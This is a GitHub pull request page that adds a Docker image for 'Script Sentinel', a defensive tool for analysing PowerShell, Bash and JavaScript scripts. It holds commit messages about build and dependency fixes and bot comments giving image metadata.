Skip to content

Add Script Sentinel Docker image for malware analysis #41063

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Open
wants to merge 14 commits into
base: master
Choose a base branch
from
Open

Add Script Sentinel Docker image for malware analysis #41063

wants to merge 14 commits into from

Conversation

@AdiPeret
Copy link
Contributor

@AdiPeret AdiPeret commented Nov 23, 2025

  • Analyzes PowerShell, Bash, and JavaScript scripts
  • MITRE ATT&CK technique identification
  • IOC extraction and XDR context
  • Based on demisto/python3 Alpine image
  • Non-root user for security
  • Includes verification script
  • Poetry-based dependency management

Status

Ready/In Progress/In Hold (Reason for hold)

Related Content Pull Request

Related PR: link to the PR at demisto/content

Related Issues

Related: link to the issue

Description

A few sentences describing the overall goals of the pull request's commits.

@AdiPeret
Add Script Sentinel Docker image for malware analysis
74eb8b2 
- Analyzes PowerShell, Bash, and JavaScript scripts
- MITRE ATT&CK technique identification
- IOC extraction and XDR context
- Based on demisto/python3 Alpine image
- Non-root user for security
- Includes verification script
- Poetry-based dependency management
@welcome
Copy link

welcome bot commented Nov 23, 2025

Thanks for opening your first pull request. You are awesome!

Questions about how we build Docker images? Make sure to checkout our README.

What happens next?

  • The CI will run the build cycle on any new/modified docker images. If the build fails make sure to review the posted comment and address the errors.
  • Once the build passes, The CI will create a development docker image which can be used for local testing. A comment with the details will be posted to this PR.
  • A member of the team will then review the pull request.
  • If all is good and both the build is passing and the pull request has passed review, you will be able to merge the PR.
  • Once merged, The CI will run another build and create a production ready docker image which will be deployed at Docker Hub under the demisto organization: https://hub.docker.com/u/demisto .

Good luck to us all!

@AdiPeret
Fix verify.py: Remove unused dotenv import
a15c167
@AdiPeret
Remove test files and node_modules from tree-sitter grammars
feae4a0 
- Remove test directories from tree-sitter-javascript and tree-sitter-powershell
- Remove node_modules directories (not needed at runtime)
- Update .gitignore to exclude test directories
- Add requirements.txt for explicit dependency management

This fixes the CI/CD pytest collection errors where test files were
being discovered in the grammar subdirectories.
@AdiPeret
Remove requirements.txt and update .gitignore per Demisto guidelines
973e6a7 
- Remove requirements.txt (should be auto-generated by build system)
- Add requirements.txt to .gitignore
- Poetry will generate requirements.txt during build from poetry.lock

This follows the official Demisto dockerfiles build process where
requirements.txt is generated from poetry.lock during CI/CD build.
@AdiPeret
Regenerate poetry.lock with proper dependency resolution
69dae87
@AdiPeret
Fix base image: Use existing demisto/python3:3.11.9.106968
e3648ff
@AdiPeret
Simplify Dockerfile: Remove bash entrypoint, use Python directly
424d50e
@AdiPeret
Add docker-entrypoint.sh with Unix line endings
8b29af2 
- Supports XSIAM wrapper mode via 'xsiam-wrapper' argument
- Supports CLI mode via 'analyze', '--help', or '-h' arguments
- Allows arbitrary commands for Demisto build verification (e.g., 'which python')
- Fixed line endings to LF (Unix) to prevent 'exec user process' errors
@AdiPeret
Remove ENTRYPOINT and USER directives to fix verification
4a435c9 
- Removed ENTRYPOINT to allow Demisto build verification to run commands directly
- Removed USER sentinel directive to avoid permission issues during verification
- The XSIAM integration will call xsiam_wrapper.py explicitly when needed
- Keeps all application code and dependencies intact
@AdiPeret
Add missing tree-sitter-language-pack dependency
9d5dd0c 
- Added tree-sitter-language-pack to pyproject.toml dependencies
- Removed poetry.lock to force regeneration with new dependency
- This package is required by sentinel/parser.py for script parsing
- Fixes ModuleNotFoundError during Docker image verification
@AdiPeret
Fix tree-sitter version compatibility
a5dfa29 
- Updated tree-sitter from 0.21.3 to ^0.22.0 for compatibility with tree-sitter-language-pack
- Regenerated poetry.lock with compatible dependencies
- Resolves dependency conflict that prevented poetry lock generation
@AdiPeret
Add build dependencies for tree-sitter-language-pack compilation
156a98a 
- Install gcc, musl-dev, python3-dev as virtual package
- Required for compiling tree-sitter-language-pack C extensions
- Clean up build deps after pip install to minimize image size
@AdiPeret
Fix: Make ADK import lazy to avoid requiring google-adk dependency
86ca2eb 
- Changed analyzer.py to use lazy import for ADK agent
- ADK is now only imported when include_llm=True
- Gracefully falls back to heuristics-only mode when ADK unavailable
- Fixes ModuleNotFoundError: No module named 'google.adk'
- Allows Docker image to work without optional LLM dependencies
@xsoar-bot
Copy link

xsoar-bot commented Nov 23, 2025

Docker Image Ready - Dev

Docker automatic build has deployed your docker image: devdemisto/script-sentinel:1.0.0.5974178
It is available now on docker hub at: https://hub.docker.com/r/devdemisto/script-sentinel/tags
Get started by pulling the image:

docker pull devdemisto/script-sentinel:1.0.0.5974178

Docker Metadata

  • Image Size: 93.93 MB
  • Image ID: sha256:6210ab1e603d4026c6af374fe23829f8417ef905106a79182ae9ec0e82ba97e9
  • Created: 2025-11-23T15:01:08.678680835Z
  • Arch: linux/amd64
  • Command: ["python3"]
  • Environment:
    • PATH=/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
    • LANG=C.UTF-8
    • GPG_KEY=A035C8C19219BA821ECEA86B64E628F8D684696D
    • PYTHON_VERSION=3.11.9
    • PYTHON_PIP_VERSION=24.0
    • PYTHON_SETUPTOOLS_VERSION=65.5.1
    • PYTHON_GET_PIP_URL=https://github.com/pypa/get-pip/raw/66d8a0f637083e2c3ddffc0cb1e65ce126afb856/public/get-pip.py
    • PYTHON_GET_PIP_SHA256=6fb7b781206356f45ad79efbb19322caa6c2a5ad39092d0d44d0fec94117e118
    • DOCKER_IMAGE=devdemisto/script-sentinel:1.0.0.5974178
    • PYTHONPATH=/app:
  • Labels:
    • com.demisto.image.category:malware-analysis
    • com.demisto.image.type:python
    • description:Script Sentinel - Malware analysis for PowerShell, Bash, and JavaScript
    • maintainer:[email protected]
    • org.opencontainers.image.authors:Demisto <[email protected]>
    • org.opencontainers.image.revision:86ca2eb7dbaf003c6db5d9489342aea85f7436a0
    • org.opencontainers.image.version:1.0.0.5974178
    • version:1.0.0

@AdiPeret
Fix Python version format: Change ^3.11 to ~3.11 for Demisto validation
afcc1e8 
- Changed python version constraint from ^3.11 to ~3.11
- Changed tree-sitter version constraint from ^0.22.0 to ~0.22.0
- Regenerated poetry.lock file with updated constraints
- Demisto build system requires tilde notation for version constraints
@xsoar-bot
Copy link

xsoar-bot commented Nov 23, 2025

Docker Image Ready - Dev

Docker automatic build has deployed your docker image: devdemisto/script-sentinel:1.0.0.5974625
It is available now on docker hub at: https://hub.docker.com/r/devdemisto/script-sentinel/tags
Get started by pulling the image:

docker pull devdemisto/script-sentinel:1.0.0.5974625

Docker Metadata

  • Image Size: 93.93 MB
  • Image ID: sha256:babf7f1cf6a22e94cf950a92038ea5d6f80836aa27189741fd3b9ec290b444b2
  • Created: 2025-11-23T15:21:32.58554888Z
  • Arch: linux/amd64
  • Command: ["python3"]
  • Environment:
    • PATH=/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
    • LANG=C.UTF-8
    • GPG_KEY=A035C8C19219BA821ECEA86B64E628F8D684696D
    • PYTHON_VERSION=3.11.9
    • PYTHON_PIP_VERSION=24.0
    • PYTHON_SETUPTOOLS_VERSION=65.5.1
    • PYTHON_GET_PIP_URL=https://github.com/pypa/get-pip/raw/66d8a0f637083e2c3ddffc0cb1e65ce126afb856/public/get-pip.py
    • PYTHON_GET_PIP_SHA256=6fb7b781206356f45ad79efbb19322caa6c2a5ad39092d0d44d0fec94117e118
    • DOCKER_IMAGE=devdemisto/script-sentinel:1.0.0.5974625
    • PYTHONPATH=/app:
  • Labels:
    • com.demisto.image.category:malware-analysis
    • com.demisto.image.type:python
    • description:Script Sentinel - Malware analysis for PowerShell, Bash, and JavaScript
    • maintainer:[email protected]
    • org.opencontainers.image.authors:Demisto <[email protected]>
    • org.opencontainers.image.revision:afcc1e87ee720b04cd7b6fed37520265cb76021a
    • org.opencontainers.image.version:1.0.0.5974625
    • version:1.0.0

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

No reviews

Assignees

No one assigned

Labels

None yet

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

3 participants

@AdiPeret @xsoar-bot